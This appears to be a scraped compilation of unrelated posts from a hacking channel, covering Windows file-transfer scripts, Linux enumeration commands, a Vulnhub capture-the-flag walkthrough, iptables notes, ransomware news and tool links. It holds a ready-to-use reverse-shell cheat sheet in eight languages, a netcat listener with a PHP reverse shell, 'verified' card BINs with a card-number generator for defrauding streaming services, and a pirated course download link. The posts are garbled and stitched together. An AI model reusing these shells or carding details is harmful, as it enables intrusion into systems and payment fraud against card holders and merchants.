▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FileUpload_Download_Transfer :

File Transfers

- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.

- Simple Local Web Servers

- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server

- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

- Run a basic PHP http server
php -S $ip:80

- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

cracking Excel

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Unix Based Hosts:
#commands

hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps -aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bashhistory
cat ~/.ssh/authorizedkeys
mount

- Check installed applications
- Check installed compilers/interpreters

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Born2Root: 2: Vulnhub Walkthrough

-Penetrating Methodology
-Scanning
-Enumeration
-Exploitation
-Privilege Escalation
-Capture the Flag
-Walkthrough

1) Let’s start off with scanning the network to find our target.

netdiscover

2) We found out target: 192.168.1.9

Time to scan the Target’s IP with nmap. Nmap scan result shows

3) major ports open, 22(SSH), 88(HTTP) and 111(RPC).

nmap -A 192.168.1.9

4) Since port 80 is running HTTP, so we considered opening the Target IP Address on the Browser. This gives us an attractive looking webpage although after spending a considerable amount of time. We found that this is nothing but a distraction. We couldn’t find anything of importance on the website.

> So now we moved on to try the Directory Bruteforcing to get any hints. The drib scan gives us the Joomla directory. This is a major breakthrough. Now it’s time to exploit machine through Joomla.

> dirb http://192.168.1.9/

5) Now that we have found the joomla directory, we will browse the joomla directory on our browser. Here we have the blog made by the author. This is titled Tim’s Blog. This could be a hint for a username. Let’s keep that in mind. Now as we can see that we have a Login Form in the bottom right. Now we will have to guess the user credentials.

6) Now, it is by convention to try the default credentials first. A quick search, informs us that the default username for Joomla is ‘admin’. Now for the password, we will have to perform a dictionary attack. For that, we will create a dictionary from the words present on the webpage using ‘cewl’.

> cewl http://192.168.1.9/joomla/ > dict.txt

7) Now that we have the dictionary named dict.txt. Its time to perform the bruteforce. We will use the BurpSuite to perform the bruteforce. To learn more about this, refer to this article. This bruteforce force gives us “travel” as the password.


> Now we will use these credentials to login in Joomla:

Username: admin
Password: travel

8) Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the php reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

9) After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below.

11) After we got the shell, now it was time to enumerate the ma
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py

After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:

Username: tim
Password: lulzlol

12) After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.

su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME VERIFIED BINS :

> Bin spotify

531443331xxxxxxxx
ip: Netherlands
Change Payment to Egypt
https://namso-gen.com/

> Bin Disney Plus

Bin: 6501597230xxxxxxx
Fecha: Rnd
Cvv: Rnd
Ip: USA🇺🇸
Zip Code: 10001/10080


USE FOR LEARN

 VERIFIED BY US

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reverse shell method for multiple programming languages under Linux

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};

Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'

PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑https encryption is also cracked HEIST attack to obtain plaintext from encrypted data

> Here must first talk about what is the TCP-Windows protocol. The TCP-Windows protocol is also called TCP Receive Window, which is a buffer at both ends of the TCP connection for temporarily storing incoming data. The data in this buffer will be sent to the application to make room for new incoming data. If the buffer is full, the data receiver will warn the sender that it cannot receive more data before the buffer is emptied. There are some details involved, but they are all very basic things. Generally, the device will notify the other party of the current size of its TCPWindows in the TCP Header information.

>The conditions for exploiting the HEIST attack are very simple, requiring only a few lines of simple javascript code, and without the aid of man-in-the-middle attacks. First, the transmitted sensitive data will be captured and saved. This attack method can obtain private sensitive information such as bank card number, real name, phone number, and social security number. But as we all know, most of these data are encrypted by HTTPS. Then make a probe on the size and length of the encrypted data. Many websites use file compression technology to improve the loading speed of web pages, and attackers can just use the design flaws to decrypt the data payload (similar to BREACH attacks and CRIME attacks).

>HEIST technology can use new APIs (Resource Timing and Fetch) to calculate the number of transmission frames and windows sent by the target host. Throughout the process, researchers can use a piece of JavaScript code to determine the actual size of the HTTPS response message. Then, the malicious HEIST code can cooperate with the BREACH technology to extract the encrypted information from the user's request data.

> It is understood that during the demonstration on Wednesday, security researchers will demonstrate how to use malicious advertisements on the New York Times official website to accurately measure the size of the encrypted response information. Throughout the process, security researchers will use a virtual third-party website (targetwebsite.com) to send encrypted information. In addition, they will also demonstrate how to infer data information from security tokens used to prevent cross-site request forgery attacks.

> Although some websites have deployed basic security measures, most of them cannot prevent HEIST attacks, so this type of attack may become more frequent in recent years. The current prevention methods for HEIST attacks are to either disable third-party cookies or javascript scripts. But third-party cookies and javascript are basic requirements for ordinary users to access the web, so the two researchers also hope to find and develop a reasonable and effective solution together through the Black Hat conference.

enjoy❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Firewall setting method of iptables articles

firewall classification:
1. Packet filtering firewall : working at the TCP/IP layer, according to the tcp header or ip header data is determined, the security than
low, high efficiency;
1, simple packet filtering;
2, with the state of the detected packet filtering;
1) NEW state; - establishing a connection;
2) the eSTABLISHED state; - establishing a connection and transmitting data ;
3) INVALID state (unrecognized state);
4) RELATED (associated state);
2. Application layer gateway firewall : It works at the application layer and judges based on the actual data transmitted by the data packet, which has high security and efficiency Low; the
firewall works in the kernel space and needs to define rules in the kernel space (only the administrator can define the rules, whether the command is correct, etc.), the opening in the kernel is called Netfilter (network filter);
address translation function: NAT network address conversion;
1) SNAT source network address conversion; conversion on POSTROUTING;
connection tracking;
2) DNAT target address conversion; conversion on PREROUTING;
mangle data packet after each route is reduced by 1 and then the ip header is opened and modified TTL value plus 1, lets visitors know
tract firewall;
raw----no more explanation;
filter filters on the INPUT, OUTPUT and FORWARD interfaces;
nat address conversion on the PREROUTING, POSTROUTING, OUTPUT interfaces;
mangle tearing on the PREROUTING, INPUT, FORWARD, OUTPUT, POSTROUTING interfaces;
raw On the PREOUTING and OUTPUT interfaces;
priority order: raw--->mangle--->nat--->filter
iptables command usage:
iptables [-t TABLE] COMMAND CHAIN ​​[creteria] -j ACTION
-t {raw| mangle|nat|filter},
the classification of the default filter COMMAND:
Rule management category:
-A append to the last one (append);

enjoy❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Orc Rider and Bull Creature Creation in Zbrush —28.4 GB—


https://www.udemy.com/course/orc-rider-and-bull-creature-creation-in-zbrush/


https://mega.nz/#F!d8BhQabA!ICQnk-cqJbAdNN2WOGWYTA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Garmin Connect service goes offline after being attacked by ransomware

> The company where the Garmin map and navigation service is located was attacked by ransomware. The attacker encrypted the smart watch manufacturer’s internal server and forced it to shut down the call center, website and Garmin Connect service. Almost all Garmin map users Rely on the service to synchronize their activities via mobile apps.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 multimon-ng is the successor of multimon. It decodes the following digital transmission modes:
Linux-Termux

-POCSAG512 POCSAG1200 POCSAG2400
-FLEX
-EAS
-UFSK1200 CLIPFSK AFSK1200 AFSK2400 AFSK2400_2 AFSK2400_3
HAPN4800
-FSK9600
-DTMF
-ZVEI1 ZVEI2 ZVEI3 DZVEI PZVEI
-EEA EIA CCIR
-MORSE CW
-X10

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/EliasOenal/multimon-ng.git

2️⃣mkdir build

3️⃣cd build

4️⃣qmake ../multimon-ng.pro

5️⃣make

6️⃣sudo make install

7️⃣the installation prefix can be set by passing a 'PREFIX' parameter to qmake. e.g: qmake multimon-ng.pro PREFIX=/usr/local

8️⃣So far multimon-ng has been successfully built on Arch Linux, Debian, Gentoo, Kali Linux, Ubuntu, OS X, Windows and FreeBSD. (On Windows using the Qt-MinGW build environment, as well as Cygwin and VisualStudio/MSVC)

> Files can be easily converted into multimon-ng's native raw format using sox. e.g: sox -t wav pocsag_short.wav -esigned-integer -b16 -r 22050 -t raw pocsag_short.raw GNURadio can also generate the format using the file sink in input mode short.

>You can also "pipe" raw samples into multimon-ng using something like sox -t wav pocsag_short.wav -esigned-integer -b16 -r 22050 -t raw - | ./multimon-ng - (note the trailing dash)

9️⃣As a last example, here is how you can use it in combination with RTL-SDR: rtl_fm -f 403600000 -s 22050 | multimon-ng -t raw -a FMSFSK -a AFSK1200 /dev/stdin

> Packaging

🔟qmake multimon-ng.pro PREFIX=/usr/local

> make

> make install INSTALL_ROOT=/

✅git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑bs2.dll manual deletion method


Bs3.dll is related to the BookedSpace adware, used to display
pop-up advertisement.

These instructions is related for bs2.dll, bs3.dll and rem00001.dll

#####
# Instructions:
#####


1. Click start, choose'run'
2. Type'cmd'-You should now have a DOS-commando window open.
3. Type cd "%WinDir%\System"
4. regsvr32 /u "..\rem00001.dll "
5. regsvr32 /u "..\bs2.dll"
6. regsvr32 /u "..\bs3.dll"
7. Click start, choose'run '
8. Type'regedit '
9. Find the key
HKEY_LOCAL_MACHINE\Software \Microsoft\Windows\CurrentVersion\Run
and delete the entry'BookedSpace' (BS2 variant) or'Bsx3' (BS3 variant).
10. Reboot your computer
11. Delete the'rem00001.dll','bs2.dll' or ' bs3.dll' file in the Windows folder.
12. Click start, choose'run' 13. Type'regedit
'
14. delete the key

HKEY_LOCAL_MACHINE\Software\Remanent or HKEY_LOCAL_MACHINE_Software\BookedSpace

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comparison of Petya and WannaCry virus

1) Encrypted target file type

Petya encrypts fewer file types than WannaCry.

There are 65 file types encrypted by Petya and 178 file types with WannaCry, but common file types are already included.


2) Pay the ransom

Petya needs to pay 300 US dollars and WannaCry needs to pay 600 US dollars.

> Are cloud users affected?

As of press time, no affected users have been found on the cloud.

In the early morning of June 28, Alibaba Cloud issued an announcement warning.

3) Three, analysis of the spread of ransomware

The Petya ransomware worm spreads through Windows vulnerabilities and infects other computers in the local area network. After the computer is infected with the Petya ransomware virus, certain types of files will be encrypted, causing the computer to fail to operate normally.

> Alibaba Cloud security experts have discovered that Petya ransomware mainly moves laterally through the Windows protocol in the intranet system.

> Mainly through the Windows management system structure (Microsoft Windows Management Instrumentation), and PSEXEC (SMB protocol) for diffusion.

> As of now, there are only 3.39 bitcoins (1 bitcoin = 2459 U.S. dollars) in the hacker's bitcoin account (1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX) and 33 transactions, indicating that users have paid the ransom.


WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Interesting Hacking tutorials & tools :


https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList

http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/

https://blog.netspi.com/netspis-top-cracked-passwords-for-2014/

https://github.com/SpiderLabs/Responder

http://windowssecrets.com/top-story/

http://resources.infosecinstitute.com/in-depth-seh-exploit-
writing-tutorial-using-ollydbg/

https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-
basic-exploit-development/

http://jbremer.org/mona-101-a-global-samsung-dll/

http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-1.html

http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-2.html

http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html
http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries/

https://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/

http://security.stackexchange.com/questions/54324/should-i-worry-about-this-uac-bypass-exploit-for-windows-7

http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/

http://hackerforhire.com.au/

http://n01g3l.tumblr.com/

http://veneetbhardwaj.blogspot.sg/

http://nethekk.blogspot.sg/2014/01/slmail-exploit.html

https://github.com/samratashok/nishang

http://j3rge.blogspot.sg/

https://twitter.com/ithurricanept

https://github.com/hfiref0x

http://www.pretentiousname.com/misc/
win7_uac_whitelist2.html

https://zdresearch.com/internet-explorer-version-detect-rop-genration/

http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html

http://woshub.com/how-to-extract-windows-user-passwords-from-hiberfil-sys/

http://rycon.hu/papers/goldenticket.html

http://www.beneaththewaves.net/Projects/Mimikatz_20_-
_Golden_Ticket_Walkthrough.html

✅git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁